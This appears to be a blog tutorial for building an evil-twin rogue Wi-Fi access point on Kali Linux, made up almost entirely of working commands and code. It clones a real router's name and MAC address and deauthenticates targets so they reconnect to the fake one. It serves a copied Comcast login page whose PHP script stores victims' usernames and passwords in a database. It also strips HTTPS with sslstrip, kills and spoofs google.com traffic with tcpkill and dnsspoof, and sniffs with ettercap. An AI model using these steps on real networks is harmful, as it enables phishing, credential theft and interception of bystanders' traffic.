| layout | title | date | categories | tags | author | identifier | comments |
|---|---|---|---|---|---|---|---|
post |
Evil Wireless Rogue Access Point |
2016-09-16 16:05:45 -0400 |
kali |
kali-linux aircrack-ng mitm |
Matrixfox |
113689429 |
true |
A rogue access point is a wireless access point that appears as a wireless router; but really, it is hosted from a malicious machine. This type of exploit is known as, Man-in-the-middle attack used for gathering intelligence. dnspoof and tcpkill will kill access to a web page and redirect to the cloned fake page. While sslstrip and driftnet will snoop on traffic coming from the redirected interface.
Internet —> Access Point —> Attacker —> Wireless
|
|_ You
Take note of the default gateway address on the access point you are connected to.
ip route | grep default
It’s wise to keep note of the machines network interfaces.
ifconfig
iwconfig
Since this is a fresh install, we need to edit some network system files. It’s a good idea to always backup your files before editing.
Make sure isc-dhcp-server is already installed, and the newest version.
apt-get install isc-dhcp-server
Once installed, edit the isc-dhcp-server file inside /etc/default directory.
nano /etc/default/isc-dhcp-server
Remove the hash tag comments from DHCPDv4_CONF and DHCPDv4_PID. Add your interfaces that should serve DHCP requests.
DHCPDv4_CONF=/etc/dhcp/dhcpd.conf
DHCPDv4_PID=/var/run/dhcpd.pid
INTERFACES="wlan0 eth0 at0"
If you're not sure about your network interfaces. Just type in ifconfig and iwconfig to see your computers network interface. You won't see at0 until you start the aircrack-ng suite.
If dhcpd.lease is missing, then create it.
touch /var/lib/dhcp/dhcpd.leases
nano /etc/dhcp/dhcpd.conf
Delete everything that’s commented out with hash tags. Then add the following inside of dhcpd.conf file.
# Use Google public DNS server (or use faster values that your internet provider gave you!):
#option domain-name-servers 8.8.8.8, 8.8.4.4;
# Show that we want to be the only DHCP server in this network:
authoritative;
default-lease-time 600;
max-lease-time 7200;
# Set up our desired subnet:
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}
When devices connect to a fake access point. DHCP will assign NAT IP's: 10.0.0.2x in the set range. The first device will be .21 then .22, etc. You can also add Google's Public DNS option domain-name-servers 8.8.8.8, 8.8.4.4; towards the top, if needed.
nano /etc/ettercap/etter.conf
Edit ec_uid and ec_gid from the default 65534 to 0. Then remove hash tag comments from the iptables use section.
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %por$
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %po$
After the network system files are edited. Put the wireless interface into monitor mode.
There’s two ways starting monitor mode. If your card is stubborn, you may have to start with manual mode commands. Either way, dhclient needs to be killed.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check
pkill dhclient
airmon-ng check kill
airmon-ng start wlan1
Once the device is in monitor mode, let’s raise the wireless adapter transmission range.
Raising transmission power inside of the United States may be illegal. Some wireless cards like the Alfa AWUS036NHA may be stuck in certain regions. By default, it’s set to 20 dBm or 100 mW. Increasing the transmission will make the router appear much closer to the victim. Tricking he or she into thinking the router is their own.
ifconfig wlan1mon down
iw reg set US
ifconfig wlan1mon up
How router broadcasting works. They broadcast small spheres that gets larger and larger. Until the beacons falls out of range. If you want a first hand look. Download Architecture of Radio for iOS by Richard Vijgen.
Open another terminal and search for network hotspots.
airodump-ng wlan1mon
Copy and paste the same Mac address -a BSSID and same router name -e ESSID running on the -c same channel.
airbase-ng -c 6 -a 00:11:22:33:44:55 -e "HOME-1234" wlan1mon
These settings need to be ran each time the system restarts. You should save these to a bash file.
While airbase-ng is running, open another terminal and type these following bash commands. It is important to match the DHCP server config file.
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
This will create at0 network interface that signs IP's from within our DHCP config.
Firstly, get your network gateway IP from earlier. Replace 192.168.1.1 with your gateway IP.
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
These redirect, forward, route and setup our network traffic. The 10000 port is a default port that was decided in advance by the sslstrip developers.
echo 1 > /proc/sys/net/ipv4/ip_forward
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0
service isc-dhcp-server restart
Unfortunately, this next part requires a bit of programming knowledge. Oh, what did you say? You fead yourself through collage - as a Freelancing web developer? Let’s get started…
Start by cloning the Comcast login page with httrack.
httrack https://login.comcast.net -O /tmp/example
If everything went okay, move files from /tmp folder to the Apache HTTP web server directory.
root@kali:~$ cd /tmp/example
root@kali:/tmp/example$ mv * /var/www/html
root@kali:/tmp/example$ cd /var/www/html/login.comcast.net
root@kali:/var/www/html/login.comcast.net$ cp login.html ../index.html
Edit the newly cloned index.html
element to redirect back to our php file.nano /var/www/html/index.html
Press CTRL + W and search for the HTML form element. Type form and press enter. Replace action=“https://login.comcast.net/login” the HTML action element with the upgrade.php file.
<form name="signin" action=“upgrade.php” method="post" onsubmit="return login.onSubmit()">
Take note of the input HTML name fields, <user> and <passwd>. We're going to insert them into our database. Essentially, we are creating a login page. Right mouse click and inspect element (Q) on the input fields. Or search for input inside of index.html.
Create the upgrade.php file inside the www/html folder.
nano /var/www/html/upgrade.php
This script is written in PHP 7.
<?php
$host="localhost";
$username="root";
$database="harvest_comcast";
// Open connection with empty password.
$conn = new mysqli($host,$username,"",$database);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
// HTML input name elements from earlier.
$htmlFormUser=$_POST['user'];
$htmlFormPasswd=$_POST['passwd'];
// Creating the SQL with victims credentials.
$sql_insert = "INSERT INTO xfinity_accounts (account, password) VALUES ('$htmlFormUser', '$htmlFormPasswd')";
// Insert SQL into Table / Database
if ($conn->query($sql_insert) === TRUE) {
// success
header("Location:index.html");
} else {
// fail
header("Location:index.html");
}
// Close connection
$conn->close();
?>If Apache and MySQL aren't running, start Apache web server, and start MySQL database.
service apache2 start
service mysql start
Now enable PHP 7.0 with a2enmod.
a2enmod php7.0
service apache2 restart
Start MySQL in root session. Then Create a database with the name harvest_comcast. After that Create a table with the name xfinity_accounts inside the of new database. This new table will take two items, account and password both with varchar(64).
root@kali:~$ mysql -u root
mysql> create database harvest_comcast;
mysql> use harvest_comcast;
mysql> create table xfinity_accounts(account varchar(64), password varchar(64));
To test the MySQL database and table, insert a demo account and password.
mysql> insert into xfinity_accounts(account, password) values ("username", "123456");
Make sure you selected a database. Then you can print out table values.
mysql> select * from xfinity_accounts;
Open Firefox and physically test the localhost web server. Make sure upgrade.php file is inserting to the mysql database. You might get some false information, since we are not verifying user credentials. Hopefully, the infinity loop redirect will entice the user to type credentials multiple times.
No matter what website the victim visits, sslstrip could harvest accounts.
Initiate SSL stripping from previous port that was set in iptables.
sslstrip -f -p -k 10000
Open another terminal and start Ettercap on the newly created interface.
ettercap -p -u -T -q -i at0
Driftnet is optional. If you’re running a virtual machine, an user login screen will appear on your computer. Just close out, without entering your credentials. It should still work.
driftnet -i at0
Kill access to Google with tcpkill. When the user tries to search something, he or she will be redirected to the Apache fake login page.
ifconfig eth0 promisc
tcpkill -9 host www.google.com
Edit the hosts file inside of the /etc folder.
nano /etc/hosts
Underneath the previous hosts inside of /etc/hosts. Add www.google.com to point to web server. This will redirect to localhost web server when the victim searches google.
192.168.1.100 www.google.com
Take the network interface out of promiscuous mode. Now run dnsspoof with the edited hosts file, that's located in /etc directory.
ifconfig eth0 -promisc
dnsspoof -f /etc/hosts
Open another terminal and run airodump-ng, replace the BSSID with the routers mac address.
airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan1mon
Deauth a device off their network. Replace -c 00:01:02:03:04:05 with the mac address of the targeted device.
aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 00:01:02:03:04:05 wlan0mon
Let's break down this command. This first part of the command -0 5 is passing the --deauth 0 argument. The routers BSSID is passed with -a 00:11:22:33:44:55 matching the previous routers mac address. Lastly, -c 00:01:02:03:04:05 is the station the device mac address is talking from.
When a device gets deauthenticate off its network. The targeted device will reconnect to the rouge access point. The DHCP server will assign IP's 10.0.0.21 in orderly fashion. With sslstrip running along side tcpkill, there's a chance you could harvest other passwords. Just check sslstrip.log file that's created in the directory where sslstrip is ran.
- Understanding the network you are on.
- Accessing PHP, Apache and isc-dhcp-server Logs.
- Make a test PHP script, and use the terminal php command.